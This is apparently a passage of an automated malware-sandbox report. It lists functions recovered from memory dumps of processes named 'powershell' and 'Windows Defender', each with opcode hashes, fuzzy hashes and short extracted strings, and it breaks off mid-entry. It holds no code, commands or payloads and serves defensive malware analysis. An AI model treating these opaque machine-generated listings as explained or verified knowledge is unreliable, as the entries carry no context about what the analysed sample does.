                                                    • Opcode ID: 53e41a643d04cc141281828b2cffe5937835dd9bb8bf472f59fe1e502d6e0b52
                                                    • Instruction ID: e26c1d3e0cda73d64811d2b6a64fd492153ac0470ef1a69d66551db1a6074b5a
                                                    • Opcode Fuzzy Hash: 53e41a643d04cc141281828b2cffe5937835dd9bb8bf472f59fe1e502d6e0b52
                                                    • Instruction Fuzzy Hash: AE31467190DBCC8FEB59CBA8984A6E97FF0EB66320F0441AFD048C7163D6645849CB92
                                                    Function 00007FFAAB84414D Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1700146156.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab840000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 618832ab7ccb3a27e8c0aa1188fd9f9a2ab647106208d9d7fea34d32ef49d5c9
                                                    • Instruction ID: bc34097f106c8ae4260c182c273409ac70bc663f8dcb42554bd526867cf86f0b
                                                    • Opcode Fuzzy Hash: 618832ab7ccb3a27e8c0aa1188fd9f9a2ab647106208d9d7fea34d32ef49d5c9
                                                    • Instruction Fuzzy Hash: 3A21B33270CA488FD758DA6CE4429E8B7E1EB5A360B1440BBD14AC31A3DE25FC49C7C5
                                                    Function 00007FFAAB844400 Relevance: .1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1700146156.00007FFAAB840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB840000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab840000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 173f0f9fcbbc006995243d03b63151015ed5ffe66a2860423d7221f434fba9b3
                                                    • Instruction ID: e3634db9505515d9b7ec7705ef33fd79f93c6baa6c829e01da2cd737e6442a32
                                                    • Opcode Fuzzy Hash: 173f0f9fcbbc006995243d03b63151015ed5ffe66a2860423d7221f434fba9b3
                                                    • Instruction Fuzzy Hash: 3E21C23270DA488FE754EA2CE4519E8B7E0EB49620B1444BBD14AC75A3EE15F845C7D0
                                                    Function 00007FFAAB7733B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                    • Instruction ID: c88741a4fa2411641a7a4c18c5feaf5f931570ceb76fb88b335b3d7e20f8e1b5
                                                    • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                    • Instruction Fuzzy Hash: 7A01677111CB0C8FD754EF0CE451AA5B7E0FB95364F10056DE58EC36A1DA36E882CB45

                                                    Non-executed Functions

                                                    Function 00007FFAAB778995 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^$O_^$O_^$O_^
                                                    • API String ID: 0-109995703
                                                    • Opcode ID: 267d9fd80bea3118dc75c3aab3febd4b8d8b07a7a3f59182053b71b5a9ed2194
                                                    • Instruction ID: 039e1fda9d12fcf4eaf18ac6fdd037c639345a4578ac4184f8d6550faab99c68
                                                    • Opcode Fuzzy Hash: 267d9fd80bea3118dc75c3aab3febd4b8d8b07a7a3f59182053b71b5a9ed2194
                                                    • Instruction Fuzzy Hash: D541D99290F7C29FF356476AC8651907FA0EFA336570E42F7C08D8F1B3E959184A8292
                                                    Function 00007FFAAB7789FA Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1697699943.00007FFAAB770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB770000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffaab770000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^$O_^$O_^$O_^
                                                    • API String ID: 0-109995703
                                                    • Opcode ID: 72f60df4ee84bd6f4f42b44c1f3d4ace933f79c04ef549563240fa30758b639b
                                                    • Instruction ID: f839ea43bf35352858e3d8d500301f32ece4331724dff3df32dc68df35ed25c5
                                                    • Opcode Fuzzy Hash: 72f60df4ee84bd6f4f42b44c1f3d4ace933f79c04ef549563240fa30758b639b
                                                    • Instruction Fuzzy Hash: 3B31999290FBC29FF256435AC8650A16FA0FF9336570E42F6C18E4A5B3E959188A41D2

                                                    Executed Functions

                                                    Function 00007FFAAB79644D Relevance: 2.0, Strings: 1, Instructions: 718COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB795000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB795000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab795000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g
                                                    • API String ID: 0-1031791518
                                                    • Opcode ID: bbd3c55ab3acc769de7095386904207a6d2073ef6fb0d8e62434ba10555e75df
                                                    • Instruction ID: 1dcdf540e37bc1cbb8b969964a4bc30d10ac5ff18d278a9ebba9faff85e9fd02
                                                    • Opcode Fuzzy Hash: bbd3c55ab3acc769de7095386904207a6d2073ef6fb0d8e62434ba10555e75df
                                                    • Instruction Fuzzy Hash: 01D18C30A09A498FDB84DF58C454EA97BB1FF69340F1482AAD40DD72A6CA75E885CBC1
                                                    Function 00007FFAAB866605 Relevance: .5, Instructions: 453COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1828372302.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e4bda2223cbe335db2ecf0ca10e50142d565bdc9707aee91eed2e6478d79036
                                                    • Instruction ID: a98d6147eeb34ef850985ded7bb2596ccb3d2bed35cd3410f8feebf05960846b
                                                    • Opcode Fuzzy Hash: 7e4bda2223cbe335db2ecf0ca10e50142d565bdc9707aee91eed2e6478d79036
                                                    • Instruction Fuzzy Hash: 0BD1476290EBCA9FE7659B6C88255F5BB91EF1B350F0841FED44DC70A3D918AC0983D1
                                                    Function 00007FFAAB79BC20 Relevance: .2, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB795000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB795000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab795000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f80b1933611ff72024d02596d2100aac8cdda29480173a30c47a2d8fe0baf38a
                                                    • Instruction ID: 11d79c184108379271c75c0e9d96c5d11b325b3152f9f3dcb0d92f5a03ca7a6d
                                                    • Opcode Fuzzy Hash: f80b1933611ff72024d02596d2100aac8cdda29480173a30c47a2d8fe0baf38a
                                                    • Instruction Fuzzy Hash: 5021F73190DB888FDB59DB5C98496E97FF0EB96321F04416BD048C7263CA719809C792
                                                    Function 00007FFAAB799FF3 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB795000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB795000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab795000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 634736bfd21b8605e2fccaeae45a133e70deb54c60b645cfa4ae312fe95ee86a
                                                    • Instruction ID: 5ab6ea374b6ad915c835201941c3d1d03c16475c94d1eb4d89f682907f66dc24
                                                    • Opcode Fuzzy Hash: 634736bfd21b8605e2fccaeae45a133e70deb54c60b645cfa4ae312fe95ee86a
                                                    • Instruction Fuzzy Hash: 734106A390BAC6CFF352576C9C550E57FB0EF22695B0843B6D099860B3FE56141A46C2
                                                    Function 00007FFAAB799758 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB795000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB795000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab795000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6519b0ad619cdb04d5115e983718f83aeb4c57d686120f561491165149494d59
                                                    • Instruction ID: e064d645a0333b2d7d9f3635316149368fc8117b700b6e54c885a035592bdf94
                                                    • Opcode Fuzzy Hash: 6519b0ad619cdb04d5115e983718f83aeb4c57d686120f561491165149494d59
                                                    • Instruction Fuzzy Hash: A131F77191CF488FEB589B5C98466E97BE0FB99311F00812FE04DD3262CA60A8558BC2
                                                    Function 00007FFAAB67ED40 Relevance: .1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1824177097.00007FFAAB67D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB67D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab67d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 76bdf7ea52d45c4f28793c17bf288a0a3238eb82dfde32cd36c032f1ee61aa25
                                                    • Instruction ID: 10d07154b04cc7e5d77ca62c5104ced4b2bf56a624261dafad7fe45de0a7d2c2
                                                    • Opcode Fuzzy Hash: 76bdf7ea52d45c4f28793c17bf288a0a3238eb82dfde32cd36c032f1ee61aa25
                                                    • Instruction Fuzzy Hash: 6C41F53140EBC48FD7569B289851A523FF5EF57360F1905DFE08CCB1A3D629A84AC792
                                                    Function 00007FFAAB7933B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB790000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab790000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: b1e65471143f2844b230ed71ff2fda1b7ab4172bc61a6a0745b4548f68134739
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: FA01677115CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45
                                                    Function 00007FFAAB86414D Relevance: .0, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1828372302.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 882cad9a6a877b0d767910e7e32e6be915917189b17cf1c07b15fa7ed97950db
                                                    • Instruction ID: 98947f995c599926274851098ceac04cd7193fafc32e5829456dde32ecd14b2d
                                                    • Opcode Fuzzy Hash: 882cad9a6a877b0d767910e7e32e6be915917189b17cf1c07b15fa7ed97950db
                                                    • Instruction Fuzzy Hash: 5CF0BE32A0D5488FD769EB5CE4528E8B3E0EF5A360B1540FAE05DC71B3DA25EC44C780
                                                    Function 00007FFAAB864400 Relevance: .0, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1828372302.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa3dbfa87a1a95f63e07f0cdc7accf7b661eaf75dff59364bd522c25ead5b477
                                                    • Instruction ID: eb22a5acdb4247394c7964a6c56e818d859e3dba6ece345849d55737b750af35
                                                    • Opcode Fuzzy Hash: fa3dbfa87a1a95f63e07f0cdc7accf7b661eaf75dff59364bd522c25ead5b477
                                                    • Instruction Fuzzy Hash: 88F0BE32A0E5448FD755EB1CE0628E8B7E0FF0A760B0540F6E04DC70B3DA26AC44C780
                                                    Function 00007FFAAB8641D1 Relevance: .0, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1828372302.00007FFAAB860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab860000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction ID: 0e292ba13caaa3d36185f6c91dbd74b335d1caea5cceec33205345a09a996438
                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                    • Instruction Fuzzy Hash: 28E0E531B0C808CF9A68DB0CE0519A9B3E1EB99361B1541A6D14EC7561DA22FC558B80

                                                    Non-executed Functions

                                                    Function 00007FFAAB798995 Relevance: 5.1, Strings: 4, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1826315861.00007FFAAB795000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB795000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_7ffaab795000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^
                                                    • API String ID: 0-2235110077
                                                    • Opcode ID: 3da6d09870a1905376cc438f7dd2c6f9adbe52d9e656c5662e7374bb89eb815c
                                                    • Instruction ID: 2d75594a3ce4b744f166cf2115fab22e2562d6c6a4eedcf939983b37f220dec2
                                                    • Opcode Fuzzy Hash: 3da6d09870a1905376cc438f7dd2c6f9adbe52d9e656c5662e7374bb89eb815c
                                                    • Instruction Fuzzy Hash: C04125A290FBC29FE39A47584C691957FB0EF53694B4D43F7C0C98B4F3E95A180A4292

                                                    Executed Functions

                                                    Function 00007FFAAB7A16E9 Relevance: 10.7, Strings: 8, Instructions: 699COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6g$6g$6g$6g$"rg$0Dq$8Mq$U
                                                    • API String ID: 0-574773328
                                                    • Opcode ID: 8f030d5412484f971f00b4488cd710ed240fba0bb932a9ea872995833b90b09b
                                                    • Instruction ID: d275e719159d142b6b96daee7dc3bfed6b38881718cf562e94acb8125cafb3fb
                                                    • Opcode Fuzzy Hash: 8f030d5412484f971f00b4488cd710ed240fba0bb932a9ea872995833b90b09b
                                                    • Instruction Fuzzy Hash: EB22E961B1DA498FE798EB3CC4596B977E1FF99341F40497DE40EC36E2CE28A8409781
                                                    Function 00007FFAAB7A20C1 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A$r6g
                                                    • API String ID: 0-4080485727
                                                    • Opcode ID: 84efc3991f03e9f4254b388cb601f130b093bb7b973d45b039715ebf48e03907
                                                    • Instruction ID: b09f7774ab9e1bf5c044d51ab88465b1c4568467c22f3adbdf9e0fbd9bc66ad5
                                                    • Opcode Fuzzy Hash: 84efc3991f03e9f4254b388cb601f130b093bb7b973d45b039715ebf48e03907
                                                    • Instruction Fuzzy Hash: 24510351A1E6C94FD796AB7898646B6BFE5EF87215B0804FFE0CDC71A3DD580806C382
                                                    Function 00007FFAAB7A0E5E Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: A
                                                    • API String ID: 0-3554254475
                                                    • Opcode ID: 6da78e83c07dd082fbb1dbdb3d3dd9e7ea86cb8958bc347833cb67713e920eda
                                                    • Instruction ID: 7ef60cf9b5074aee88d8bc7754360bc3b9c9a60c2b1fe243a8a34e8db85a9d2e
                                                    • Opcode Fuzzy Hash: 6da78e83c07dd082fbb1dbdb3d3dd9e7ea86cb8958bc347833cb67713e920eda
                                                    • Instruction Fuzzy Hash: 2E715B53A0D6965EE366B73CE8199F93B95DF87230B0985FBD0CDCB5A3DC0828468391
                                                    Function 00007FFAAB7A0AFA Relevance: 2.7, Strings: 2, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: 18afabcd7164d521a29e7e9997fe42bf16fbef9b714b15413295b00c38ce6477
                                                    • Instruction ID: 530d99f9fa9526cd1ea7318d0553efab4998d662d16d2bf313a63635b5ef225a
                                                    • Opcode Fuzzy Hash: 18afabcd7164d521a29e7e9997fe42bf16fbef9b714b15413295b00c38ce6477
                                                    • Instruction Fuzzy Hash: F851E173A0A61EDFDB54BB7CE8459FC73B1EF85325B448ABAD009C7292CD2864458780
                                                    Function 00007FFAAB7A0B6F Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HBq$U
                                                    • API String ID: 0-1178704416
                                                    • Opcode ID: 1070693d41654ed3c3fb8365c7398752349dd23fe2bab8f2dc0204b584268239
                                                    • Instruction ID: 0062f2469d383d7210b408a8f6bf3f6cea4a7bf2e1a99b96d66d9b02b778d4a9
                                                    • Opcode Fuzzy Hash: 1070693d41654ed3c3fb8365c7398752349dd23fe2bab8f2dc0204b584268239
                                                    • Instruction Fuzzy Hash: 1841E376A09A1E9FDB44FB7CD855AFD73A1FF85312F4086BAD009C7292CE3464468780
                                                    Function 00007FFAAB7A07F2 Relevance: 2.6, Strings: 2, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ;M_$<M_^
                                                    • API String ID: 0-3421805066
                                                    • Opcode ID: f7b477898bc60c45ddf2a810701af752229280843a651fa7676199f01c4893fe
                                                    • Instruction ID: fb21b3d653a7cc83ddfd2386b0cf785e046ade05d28d2c711eb12b1d7ecf1b6a
                                                    • Opcode Fuzzy Hash: f7b477898bc60c45ddf2a810701af752229280843a651fa7676199f01c4893fe
                                                    • Instruction Fuzzy Hash: 40412476A4978D9FD350EB7CD8968F87BA0EF85251780C9FDD408CB392CD2C68449B81
                                                    Function 00007FFAAB7A11F2 Relevance: 1.8, Strings: 1, Instructions: 579COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: 7f48d8b15e171d6c819a24587e6679cf60d2a496f7dfe048e05ee1caee132c5d
                                                    • Instruction ID: edbeb81cf30f0278d1d5408ff9f4b0b0eb5b2872ed0977cb1a8e3dec0ca3d60c
                                                    • Opcode Fuzzy Hash: 7f48d8b15e171d6c819a24587e6679cf60d2a496f7dfe048e05ee1caee132c5d
                                                    • Instruction Fuzzy Hash: 4E513863E0A69A9EE751A77CE8650FD7F70EF43260B0986FBC08DDA4A3DC1424098390
                                                    Function 00007FFAAB7A11F0 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 2M_^
                                                    • API String ID: 0-3000290509
                                                    • Opcode ID: d799cc8ef2bac328f75aeedf7bec5e4eb07147524375dfd9bf7ed5c82fba2746
                                                    • Instruction ID: 174e4590fbc1bd1cbab49726656ad57859cad462e12015ff5c07f998753d69c8
                                                    • Opcode Fuzzy Hash: d799cc8ef2bac328f75aeedf7bec5e4eb07147524375dfd9bf7ed5c82fba2746
                                                    • Instruction Fuzzy Hash: 33512963E0A69A9EE751A77CEC655FD7F70DF43260B0986FBC08DDA4A3DC1824098391
                                                    Function 00007FFAAB7A0638 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: r6g
                                                    • API String ID: 0-2482269165
                                                    • Opcode ID: c95f07baf9b0e039ca81ec507d20e81b3e7fd1bc25c3b89ef9c9a845e9b86e28
                                                    • Instruction ID: 19bb330f0a2183039044e3ef61318a3ae2465efe6292c19f330c4b14ea8a5865
                                                    • Opcode Fuzzy Hash: c95f07baf9b0e039ca81ec507d20e81b3e7fd1bc25c3b89ef9c9a845e9b86e28
                                                    • Instruction Fuzzy Hash: 8E31E661B1C9094FE798EB2CD469679B6D6FF99310F0405BEE00EC33A3DD689C018381
                                                    Function 00007FFAAB7A2291 Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8eq
                                                    • API String ID: 0-356513418
                                                    • Opcode ID: ce8d6684d7da61029320062257d2165d034e9b3144cd549f0515aebc61336fd1
                                                    • Instruction ID: d2390d1bbeb6798484ba1fe7f01f582f9768b708a1b73ef8854369f8f7ce1292
                                                    • Opcode Fuzzy Hash: ce8d6684d7da61029320062257d2165d034e9b3144cd549f0515aebc61336fd1
                                                    • Instruction Fuzzy Hash: 48012F1180FB818FE391A33C58654313FF0CB962A1B0948BEE88CC60F3D8886E4883C2
                                                    Function 00007FFAAB7A12B8 Relevance: .5, Instructions: 485COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e631de0d30bcedf950f444a5678e049a75e9f631360aa69273c297932c86450
                                                    • Instruction ID: 30a32f1cf6aaf8e7db07230a69677e50fd3dbe45ed0dc1ac65a8eafdb55d313b
                                                    • Opcode Fuzzy Hash: 7e631de0d30bcedf950f444a5678e049a75e9f631360aa69273c297932c86450
                                                    • Instruction Fuzzy Hash: A731F562E0AA8E8FE791D768D8651FCBFB1EF46240F4546FBC00DE71A6CD6428098791
                                                    Function 00007FFAAB7A0D48 Relevance: .1, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction ID: 066d5cf18f932706d4f24142d9ebb86ba15a3628c1a94be8c741039da6bc7d4e
                                                    • Opcode Fuzzy Hash: d741c102585670246797f85f1e6d2eac4f48375a5fe5ec687f62ef4bcce1466a
                                                    • Instruction Fuzzy Hash: 28218152B1590A8FFB94BBBCD80A7FC72D6EF98751F10457AE00DC3292DD28A8014381
                                                    Function 00007FFAAB7A086D Relevance: .1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.1620764846.00007FFAAB7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB7A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffaab7a0000_Windows Defender.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82b0a7f37df965f826878ad8a3a2dce6cc187417f6b5f879bd7032387d5007e5
                                                    • Instruction ID: 27cf5027ccc7c2d8f9266ab6cd5088260877b0c4250a900587954f5298e4a04a
                                                    • Opcode Fuzzy Hash: 82b0a7f37df965f826878ad8a3a2dce6cc187417f6b5f879bd7032387d5007e5
                                                    • Instruction Fuzzy Hash: AE218079658B4D5FD750EB2CD4929BD7F61BB88241BC1C8ECD808CB796CD286940AB41

                                                    Executed Functions

                                                    Function 00007FFAAB7A16E9 Relevance: 10.7, Strings: 8, Instructions: 699COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
